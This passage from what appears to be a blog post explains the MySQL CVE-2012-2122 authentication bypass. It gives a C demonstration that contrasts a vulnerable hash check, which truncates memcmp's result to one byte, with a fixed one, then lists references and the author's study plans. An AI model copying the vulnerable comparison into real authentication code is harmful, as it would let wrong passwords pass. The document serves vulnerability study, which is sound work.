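/* Added illustration (not MySQL's code) of the CVE-2012-2122 comparison bug.
 * memcmp() returns an int and C specifies only its sign, so an optimized
 * implementation may return any non-zero int, e.g. 256, for differing buffers.
 * Narrowing that int to a one-byte type keeps the low 8 bits: 256 becomes 0,
 * and "different" is read as "equal" roughly once per 256 random scrambles. */
#include <stdio.h>
#define SHA1_HASH_SIZE 20

/* One-byte result type, standing in for MySQL's my_bool return type. */
typedef unsigned char my_bool;

/* Constructed stand-in for a word-at-a-time memcmp: returns the difference of
 * the first mismatching 16-bit big-endian words, a multiple of 256 whenever
 * only the high byte of that word differs. */
static int wide_memcmp(const void *a, const void *b, size_t n)
{
    const unsigned char *x = a, *y = b;
    for (size_t i = 0; i + 1 < n; i += 2) {
        int wx = (x[i] << 8) | x[i + 1];
        int wy = (y[i] << 8) | y[i + 1];
        if (wx != wy)
            return wx - wy;
    }
    return 0;
}

/* Vulnerable shape: the int result is returned through a one-byte type, so
 * 256 is silently truncated to 0, the "scramble matches" value. */
my_bool check_scramble_vulnerable(const unsigned char *token,
                                  const unsigned char *expected)
{
    return wide_memcmp(token, expected, SHA1_HASH_SIZE);
}

/* Fixed shape: test the full int against zero, then return the boolean. */
my_bool check_scramble_fixed(const unsigned char *token,
                             const unsigned char *expected)
{
    return wide_memcmp(token, expected, SHA1_HASH_SIZE) != 0;
}

/* Constructed expected hash and a token differing only in byte 0 by one;
 * wide_memcmp() returns 0x0100 = 256 for this pair. */
static const unsigned char expected_hash[SHA1_HASH_SIZE] = { 0x10, 0x22 };
static const unsigned char wrong_token[SHA1_HASH_SIZE]   = { 0x11, 0x22 };

/* 1 if the vulnerable check accepts the wrong token (0 means "match"). */
int vulnerable_accepts_wrong_token(void)
{
    return check_scramble_vulnerable(wrong_token, expected_hash) == 0;
}

/* 1 if the fixed check accepts the wrong token; it must not. */
int fixed_accepts_wrong_token(void)
{
    return check_scramble_fixed(wrong_token, expected_hash) == 0;
}

int main(void)
{
    printf("vulnerable accepts wrong token: %d\n", vulnerable_accepts_wrong_token());
    printf("fixed accepts wrong token:      %d\n", fixed_accepts_wrong_token());
    return 0;
}
```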

References:

http://www.freebuf.com/vuls/3815.html

http://blog.51cto.com/linuxgeek/998210

https://www.exploit-db.com/exploits/19092/

https://github.com/vulhub/vulhub/tree/master/mysql/CVE-2012-2122

https://blog.rapid7.com/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql/

Next:

1. Analyze the MySQL source code (see http://blog.51cto.com/linuxgeek/998210) for further study.

2. Analyze the nmap and Metasploit scripts to improve script-writing skills.

3. Reproduce the vulnerable environment: I have downloaded the affected MySQL version from the official site and installed it on Windows, but have not managed to reproduce the issue yet!

Author: 竹小冉
Source link: https://www.cnblogs.com/zhuxr/p/9553541.html


Article link: https://www.javaclub.cn/database/118049.html